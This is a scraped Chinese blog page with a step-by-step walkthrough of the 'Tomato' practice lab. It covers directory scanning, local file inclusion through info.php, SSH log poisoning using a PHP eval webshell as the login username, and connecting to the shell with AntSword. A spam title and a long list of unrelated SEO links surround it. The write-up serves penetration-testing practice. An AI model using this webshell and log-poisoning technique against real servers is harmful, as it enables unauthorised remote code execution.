当前位置: 首页 > news >正文

备案价格网站百搜科技

备案价格网站,百搜科技,商城网站建设如何交谈,深圳网站和app建设步骤一,我们来到tomato页面 什么也弄不了只有一番茄图片 弱口令不行,xxs也不行,xxe还是不行 我们来使用kali来操作... 步骤二,使用dirb再扫一下, dirb http://172.16.1.133 1.发现这个文件可以访问.我们来访问一下 /antibot_i…

步骤一,我们来到tomato页面

什么也弄不了只有一番茄图片

弱口令不行,xxs也不行,xxe还是不行

我们来使用kali来操作...

步骤二,使用dirb再扫一下, dirb http://172.16.1.133

1.发现这个文件可以访问.我们来访问一下

/antibot_image/

2.我们来看看他文件里面有什么东西是我们可以利用的!

3.找到网站绝对路径 info.php我们来点击进去

4.查看页面源代码 可以发现image的文件包含.

5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞

最下边

步骤三,将一句话木马作为ssh登录的用户名登录

1.输入

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

2.页面通过image传参查看日志文件

/var/log/auth.log

这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了

发现多了一些报错信息,大概率写入木马成功.

步骤四,直接使用蚁剑进行连接:

http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log

密码:cmd

连接成功

http://www.mnyf.cn/news/53941.html

相关文章:

  • 龙岗南联网站建设外贸谷歌seo
  • 公司建网站多少钱晋江文学城搜索引擎推广方法
  • 益阳建设网站公司营销策略包括哪些内容
  • 丰联汽配网站建设成本营销方式和手段
  • 广州网站备案要多久网络营销的目的是
  • 软件开发公司的组织架构百度上做优化一年多少钱
  • 网站开发实践报告免费推广引流app
  • 徐州建设网站网站top排行榜
  • 网站建设前台后台设计网站seo
  • 上海网站制作总裁班课程培训
  • 怎么开通自己的微信公众号优化英文
  • 东莞网站关键词优化公司头条今日头条
  • 建站吧网站建设windows优化大师下载
  • 网站注册时间推广资讯
  • 绥中建设厅网站项目网
  • 重庆装修网郑州seo推广
  • 深圳做网站排名哪家专业美业推广平台
  • 如何用wordpress制作网站广州网络推广万企在线
  • 个人可以建购物网站吗建站公司
  • 公司网站的服务器精准引流推广团队
  • 设计展板排版样式南京seo按天计费
  • 郴州网站建设站长查询域名
  • 南昌网站建设渠道网站为什么要seo?
  • 智慧治水网站系统建设网站推广优化技巧
  • 白云营销型网站建设上海今日头条新闻
  • 做哪个网站比较有流量seo上首页
  • 网站名称是什么意思即刻搜索
  • 网络推广网站排名西安seo网络优化公司
  • 做ppt的模板网站刷百度指数
  • 福州新闻网首页南京网站seo